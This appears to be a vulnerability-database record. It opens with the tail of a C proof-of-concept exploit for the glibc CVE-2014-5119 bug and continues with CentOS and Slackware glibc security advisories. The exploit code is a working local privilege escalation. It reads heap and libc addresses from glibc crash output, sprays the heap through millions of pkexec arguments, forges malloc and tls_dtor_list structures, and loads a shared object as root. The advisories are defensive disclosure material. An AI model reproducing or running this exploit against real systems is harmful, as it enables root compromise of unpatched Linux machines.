\r\nstatic void logmessage(int level, const char * format, ...)\r\n{\r\n va_list ap;\r\n \r\n switch (level) {\r\n case LOG_DEBUG: fprintf(stderr, "[*] "); break;\r\n case LOG_WARN: fprintf(stderr, "[*] "); break;\r\n case LOG_ERROR: fprintf(stderr, "[!] "); break;\r\n }\r\n \r\n va_start(ap, format);\r\n vfprintf(stderr, format, ap);\r\n va_end(ap);\r\n \r\n fputc('\\n', stderr);\r\n \r\n if (level == LOG_ERROR) {\r\n _exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\n// Parse a libc malloc assertion message to extract useful pointers.\r\n//\r\n// Note, this isn't to defeat ASLR, it just makes it more portable across\r\n// different system configurations. ASLR is already nullified using rlimits,\r\n// although technically even that isn't necessary.\r\nstatic int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)\r\n{\r\n FILE *pty;\r\n char *mallocerror;\r\n char *memorymap;\r\n char *line;\r\n char *prev;\r\n char message[1 << 14];\r\n char *anon = NULL;\r\n char r, w, x, s;\r\n ssize_t count;\r\n int status;\r\n uintptr_t mapstart;\r\n uintptr_t mapend;\r\n \r\n // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot\r\n // be changed in setuid programs, so this wrapper catches tty output.\r\n while (true) {\r\n // Reset any previous output.\r\n memset(message, 0, sizeof message);\r\n \r\n logmessage(LOG_DEBUG, "Attempting to invoke pseudo-pty helper (this will take a few seconds)...");\r\n \r\n if ((pty = popen("./pty", "r")) == NULL) {\r\n logmessage(LOG_ERROR, "failed to execute pseudo-pty helper utility, cannot continue");\r\n }\r\n \r\n if ((count = fread(message, 1, sizeof message, pty)) <= 0) {\r\n logmessage(LOG_ERROR, "failed to read output from pseudo-pty helper, %d (%m)", count, message);\r\n }\r\n \r\n logmessage(LOG_DEBUG, "Read %u bytes of output from pseudo-pty helper, parsing...", count);\r\n \r\n pclose(pty);\r\n \r\n mallocerror = strstr(message, "corrupted double-linked list");\r\n memorymap = strstr(message, "======= Memory map: ========");\r\n \r\n // Unfortunately this isn't reliable, keep trying until it works.\r\n if (mallocerror == NULL || memorymap == NULL) {\r\n logmessage(LOG_WARN, "expected output missing (this is normal), trying again...");\r\n continue;\r\n }\r\n \r\n logmessage(LOG_DEBUG, "pseudo-pty helper succeeded");\r\n break;\r\n }\r\n \r\n *baseaddr = 0;\r\n *chunkptr = 0;\r\n *bssaddr = 0;\r\n *libcaddr = 0;\r\n \r\n logmessage(LOG_DEBUG, "attempting to parse libc fatal error message...");\r\n \r\n // Verify this is a message we understand.\r\n if (!mallocerror || !memorymap) {\r\n logmessage(LOG_ERROR, "unable to locate required error messages in crash dump");\r\n }\r\n \r\n // First, find the chunk pointer that malloc doesn't like\r\n if (sscanf(mallocerror, "corrupted double-linked list: %p ***", chunkptr) != 1) {\r\n logmessage(LOG_ERROR, "having trouble parsing this error message: %.20s", mallocerror);\r\n };\r\n \r\n logmessage(LOG_DEBUG, "discovered chunk pointer from `%.20s...`, => %p", mallocerror, *chunkptr);\r\n logmessage(LOG_DEBUG, "attempting to parse the libc maps dump...");\r\n \r\n // Second, parse maps.\r\n for (prev = line = memorymap; line = strtok(line, "\\n"); prev = line, line = NULL) {\r\n char filename[32];\r\n \r\n // Reset filename.\r\n memset(filename, 0, sizeof filename);\r\n \r\n // Just ignore the banner printed by glibc.\r\n if (strcmp(line, "======= Memory map: ========") == 0) {\r\n continue;\r\n }\r\n \r\n if (sscanf(line, "%08x-%08x %c%c%c%c %*8x %*s %*u %31s", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {\r\n // Record the last seen anonymous map, in case the kernel didn't tag the heap.\r\n if (strlen(filename) == 0) {\r\n anon = line;\r\n }\r\n \r\n // If the kernel did tag the heap, then everything is easy.\r\n if (strcmp(filename, "[heap]") == 0) {\r\n logmessage(LOG_DEBUG, "successfully located first morecore chunk w/tag @%p", mapstart);\r\n *baseaddr = mapstart;\r\n }\r\n \r\n // If it didn't tag the heap, then we need the anonymous chunk before the stack.\r\n if (strcmp(filename, "[stack]") == 0 && !*baseaddr) {\r\n logmessage(LOG_WARN, "no [heap] tag was found, using heuristic...");\r\n if (sscanf(anon, "%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s", baseaddr, filename) < 1) {\r\n logmessage(LOG_ERROR, "expected to find heap location in line `%s`, but failed", anon);\r\n }\r\n logmessage(LOG_DEBUG, "located first morecore chunk w/o tag@%p", *baseaddr);\r\n }\r\n \r\n if (strcmp(filename, "/usr/lib/libc-2.18.so") == 0 && x == 'x') {\r\n logmessage(LOG_DEBUG, "found libc.so mapped @%p", mapstart);\r\n *libcaddr = mapstart;\r\n }\r\n \r\n // Try to find libc bss.\r\n if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {\r\n logmessage(LOG_DEBUG, "expecting libc.so bss to begin at %p", mapstart);\r\n *bssaddr = mapstart;\r\n }\r\n continue;\r\n }\r\n \r\n logmessage(LOG_ERROR, "unable to parse maps line `%s`, quiting", line);\r\n break;\r\n }\r\n \r\n return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;\r\n}\r\n \r\nstatic const size_t heap_chunk_start = 0x506c8008;\r\nstatic const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);\r\n \r\nstatic const size_t nstrings = 15840000;\r\n \r\n// The offset into libc-2.18.so BSS of tls_dtor_list.\r\nstatic const uintptr_t kTlsDtorListOffset = 0x12d4;\r\n \r\n// The DSO we want to load as euid 0.\r\nstatic const char kExploitDso[] = "./exploit.so";\r\n \r\nint main(int argc, const char* argv[])\r\n{\r\n uintptr_t baseaddr;\r\n uintptr_t chunkptr;\r\n uintptr_t bssaddr;\r\n uintptr_t libcaddr;\r\n uint8_t *param;\r\n char **args;\r\n dlist_t *chain;\r\n struct utsname ubuf;\r\n \r\n // Look up host type.\r\n if (uname(&ubuf) != 0) {\r\n logmessage(LOG_ERROR, "failed to query kernel information");\r\n }\r\n \r\n logmessage(LOG_DEBUG, "---------------------------------------------------");\r\n logmessage(LOG_DEBUG, "CVE-2014-5119 glibc __gconv_translit_find() exploit");\r\n logmessage(LOG_DEBUG, "------------------------ taviso & scarybeasts -----");\r\n \r\n // Print some warning that this isn't going to work on Ubuntu.\r\n if (access("/etc/fedora-release", F_OK) != 0 || strcmp(ubuf.machine, "i686") != 0)\r\n logmessage(LOG_WARN, "This proof of concept is designed for 32 bit Fedora 20");\r\n \r\n // Extract some useful pointers from glibc error output.\r\n if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {\r\n logmessage(LOG_ERROR, "unable to parse libc fatal error message, please try again.");\r\n }\r\n \r\n logmessage(LOG_DEBUG, "allocating space for argument structure...");\r\n \r\n // This number of "-u" arguments is used to spray the heap.\r\n // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.\r\n // The value is just large enough to usuaully crash the heap into the stack without going OOM.\r\n if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {\r\n logmessage(LOG_ERROR, "allocating argument structure failed");\r\n }\r\n \r\n logmessage(LOG_DEBUG, "creating command string...");\r\n \r\n args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);\r\n args[nstrings * 2 + 2] = NULL;\r\n \r\n logmessage(LOG_DEBUG, "creating a tls_dtor_list node...");\r\n \r\n // The length 59 is chosen to cause a 64byte allocation by stdrup. That is\r\n // a 60 byte nul-terminated string, followed by 4 bytes of metadata.\r\n param = alloc_repeated_string(59, 'A', 'A', 0);\r\n chain = (void *) param;\r\n \r\n logmessage(LOG_DEBUG, "open_translit() symbol will be at %p", libcaddr + _OPEN_TRANSLIT_OFF);\r\n logmessage(LOG_DEBUG, "offsetof(struct known_trans, fname) => %u", offsetof(known_t, fname));\r\n \r\n chain->func = libcaddr + _OPEN_TRANSLIT_OFF;\r\n chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);\r\n chain->map = baseaddr + 8 + sizeof(*chain);\r\n chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);\r\n \r\n logmessage(LOG_DEBUG, "appending `%s` to list node", kExploitDso);\r\n \r\n memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);\r\n \r\n logmessage(LOG_DEBUG, "building parameter list...");\r\n for (int i = 0; i < nstrings; ++i) {\r\n args[i*2 + 1] = "-u";\r\n args[i*2 + 2] = (void *) chain;\r\n }\r\n \r\n // Verify we didn't sneak in a NUL.\r\n assert(memchr(chain, 0, sizeof(chain)) == NULL);\r\n \r\n logmessage(LOG_DEBUG, "anticipating tls_dtor_list to be at %p", bssaddr + kTlsDtorListOffset);\r\n \r\n // Spam all of possible chunks (some are unfortunately missed).\r\n for (int i = 0; true; i++) {\r\n uintptr_t chunksize = 64;\r\n uintptr_t chunkaddr = baseaddr + i * chunksize;\r\n uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;\r\n uintptr_t chunkpageoffset = PAGE_MASK;\r\n uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);\r\n uint8_t *param = NULL;\r\n mchunk_t chunk = {\r\n .prev_size = 0xCCCCCCCC,\r\n .size = 0xDDDDDDDD,\r\n .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,\r\n .bk_nextsize = baseaddr + 8,\r\n };\r\n \r\n // Compensate for heap metadata every 1MB of allocations.\r\n chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);\r\n \r\n if (chunkaddr < heap_chunk_start)\r\n continue;\r\n \r\n if (chunkaddr > heap_chunk_end)\r\n break;\r\n \r\n chunkpageoffset = chunkaddr & ~PAGE_MASK;\r\n \r\n if (chunkpageoffset > targetpageoffset) {\r\n continue;\r\n }\r\n \r\n if (targetpageoffset - chunkpageoffset > chunksize) {\r\n continue;\r\n }\r\n \r\n // Looks like this will fit, compensate the pointers for alignment.\r\n chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);\r\n \r\n if (memchr(&chunk, 0, sizeof chunk)) {\r\n logmessage(LOG_WARN, "parameter %u would contain a nul, skipping", i);\r\n continue;\r\n }\r\n args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);\r\n \r\n memcpy(param + (targetpageoffset - chunkpageoffset),\r\n &chunk,\r\n sizeof chunk);\r\n }\r\n \r\n setrlimit(RLIMIT_STACK, &kRlimMax);\r\n setrlimit(RLIMIT_DATA, &kRlimMin);\r\n \r\n args[0] = "pkexec";\r\n \r\n logmessage(LOG_DEBUG, "execvpe(%s...)...", args[0]);\r\n execvpe("pkexec", args, kCorruptCharsetEnviron);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87222", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0327\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the files back end of Name Service Switch (NSS) did not\nisolate iteration over an entire database from key-based look-up API calls.\nAn application performing look-ups on a database while iterating over it\ncould enter an infinite loop, leading to a denial of service.\n(CVE-2014-8121)\n\nThis update also fixes the following bugs:\n\n* Due to problems with buffer extension and reallocation, the nscd daemon\nterminated unexpectedly with a segmentation fault when processing long\nnetgroup entries. With this update, the handling of long netgroup entries\nhas been corrected and nscd no longer crashes in the described scenario.\n(BZ#1138520)\n\n* If a file opened in append mode was truncated with the ftruncate()\nfunction, a subsequent ftell() call could incorrectly modify the file\noffset. This update ensures that ftell() modifies the stream state only\nwhen it is in append mode and the buffer for the stream is not empty.\n(BZ#1156331)\n\n* A defect in the C library headers caused builds with older compilers to\ngenerate incorrect code for the btowc() function in the older compatibility C++\nstandard library. Applications calling btowc() in the compatibility C++ standard\nlibrary became unresponsive. With this update, the C library headers have been\ncorrected, and the compatibility C++ standard library shipped with Red Hat\nEnterprise Linux has been rebuilt. Applications that rely on the compatibility\nC++ standard library no longer hang when calling btowc(). (BZ#1120490)\n\n* Previously, when using netgroups and the nscd daemon was set up to cache\nnetgroup information, the sudo utility denied access to valid users. The bug in\nnscd has been fixed, and sudo now works in netgroups as\nexpected. (BZ#1080766)\n\nUsers of glibc are advised to upgrade to these updated packages, which fix these\nissues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-March/001556.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0327.html", "modified": "2015-03-17T13:28:04", "published": "2015-03-17T13:28:04", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-March/001556.html", "id": "CESA-2015:0327", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0016\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name Server\nCaching Daemon (nscd) used by multiple programs on the system. Without\nthese libraries, the Linux system cannot function correctly.\n\nAn out-of-bounds read flaw was found in the way glibc's iconv() function\nconverted certain encoded data to UTF-8. An attacker able to make an\napplication call the iconv() function with a specially crafted argument\ncould use this flaw to crash that application. (CVE-2014-6040)\n\nIt was found that the wordexp() function would perform command substitution\neven when the WRDE_NOCMD flag was specified. An attacker able to provide\nspecially crafted input to an application using the wordexp() function, and\nnot sanitizing the input correctly, could potentially use this flaw to\nexecute arbitrary commands with the credentials of the user running that\napplication. (CVE-2014-7817)\n\nThe CVE-2014-7817 issue was discovered by Tim Waugh of the Red Hat\nDeveloper Experience Team.\n\nThis update also fixes the following bugs:\n\n* Previously, when an address lookup using the getaddrinfo() function for\nthe AF_UNSPEC value was performed on a defective DNS server, the server in\nsome cases responded with a valid response for the A record, but a referral\nresponse for the AAAA record, which resulted in a lookup failure. A prior\nupdate was implemented for getaddrinfo() to return the valid response, but\nit contained a typographical error, due to which the lookup could under\nsome circumstances still fail. This error has been corrected and\ngetaddrinfo() now returns a valid response in the described circumstances.\n(BZ#1172023)\n\n* An error in the dlopen() library function previously caused recursive\ncalls to dlopen() to terminate unexpectedly or to abort with a library\nassertion. This error has been fixed and recursive calls to dlopen() no\nlonger crash or abort. (BZ#1173469)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020863.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0016.html", "modified": "2015-01-07T22:45:41", "published": "2015-01-07T22:45:41", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/020863.html", "id": "CESA-2015:0016", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:21", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:1110\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn off-by-one heap-based buffer overflow flaw was found in glibc's internal\n__gconv_translit_find() function. An attacker able to make an application\ncall the iconv_open() function with a specially crafted argument could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-5119)\n\nA directory traveral flaw was found in the way glibc loaded locale files.\nAn attacker able to make an application use a specially crafted locale name\nvalue (for example, specified in an LC_* environment variable) could\npossibly use this flaw to execute arbitrary code with the privileges of\nthat application. (CVE-2014-0475)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-0475.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/020518.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/020519.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-August/020520.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1110.html", "modified": "2014-08-29T21:03:35", "published": "2014-08-29T20:28:37", "href": "http://lists.centos.org/pipermail/centos-announce/2014-August/020518.html", "id": "CESA-2014:1110", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:12", "bulletinFamily": "unix", "description": "New glibc packages are available for Slackware 14.1 and -current to fix\nsecurity issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/glibc-2.17-i486-8_slack14.1.txz: Rebuilt.\n This update fixes several security issues, and adds an extra security\n hardening patch from Florian Weimer. Thanks to mancha for help with\n tracking and backporting patches.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4424\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4412\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4237\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4788\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4043\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0475\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040\n (* Security fix *)\npatches/packages/glibc-i18n-2.17-i486-8_slack14.1.txz: Rebuilt.\npatches/packages/glibc-profile-2.17-i486-8_slack14.1.txz: Rebuilt.\npatches/packages/glibc-solibs-2.17-i486-8_slack14.1.txz: Rebuilt.\npatches/packages/glibc-zoneinfo-2014i-noarch-1_slack14.1.txz: Upgraded.\n Upgraded to tzcode2014i and tzdata2014i.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-i18n-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-profile-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-solibs-2.17-i486-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-zoneinfo-2014i-noarch-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-i18n-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-profile-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-solibs-2.17-x86_64-8_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-zoneinfo-2014i-noarch-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.20-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-zoneinfo-2014i-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.20-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.20-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.20-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.20-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-zoneinfo-2014i-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.20-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.20-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.20-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 packages:\n8995409d8ed617125649aaab14299f61 glibc-2.17-i486-8_slack14.1.txz\n877bba4ad31eb68c7e7cce11f6aafd5b glibc-i18n-2.17-i486-8_slack14.1.txz\nf89a9319a1798771b26488e99f0dd1af glibc-profile-2.17-i486-8_slack14.1.txz\nd1756f2721cbb2955152c46ef5fab72e glibc-solibs-2.17-i486-8_slack14.1.txz\nc7080f6d7f309ba2905dacfa555a8115 glibc-zoneinfo-2014i-noarch-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n32904ee5d2a3177d621c4c6f2aa6e67f glibc-2.17-x86_64-8_slack14.1.txz\n1bb4ddd6d4043d632e78dbf3103f2f7c glibc-i18n-2.17-x86_64-8_slack14.1.txz\ne6914d464f57ea493502eea4dd40044a glibc-profile-2.17-x86_64-8_slack14.1.txz\n04562128e188daaad7fdab49756a22f2 glibc-solibs-2.17-x86_64-8_slack14.1.txz\nc7080f6d7f309ba2905dacfa555a8115 glibc-zoneinfo-2014i-noarch-1_slack14.1.txz\n\nSlackware -current packages:\nf547fe51634c852ae17cb1f6c39203e1 a/glibc-solibs-2.20-i486-1.txz\nc7080f6d7f309ba2905dacfa555a8115 a/glibc-zoneinfo-2014i-noarch-1.txz\nf9923d8006a3c03520e93608114cb7de l/glibc-2.20-i486-1.txz\n658301364b68e79d53acb607cd399504 l/glibc-i18n-2.20-i486-1.txz\nd03947abf3d4be41f7bfb0a71bd29f35 l/glibc-profile-2.20-i486-1.txz\n\nSlackware x86_64 -current packages:\na0f46b305c27dd0c80e65cc77254bdf2 a/glibc-solibs-2.20-x86_64-1.txz\nc7080f6d7f309ba2905dacfa555a8115 a/glibc-zoneinfo-2014i-noarch-1.txz\nd673acf56308355713ac67ae68e6bd2b l/glibc-2.20-x86_64-1.txz\n410918dc8bf5b7a84d1bed5b6e125ee3 l/glibc-i18n-2.20-x86_64-1.txz\nc023f4514cd0a672e4852986c74268e6 l/glibc-profile-2.20-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-*.txz", "modified": "2014-10-23T22:36:04", "published": "2014-10-23T22:36:04", "id": "SSA-2014-296-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.647059", "title": "glibc", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
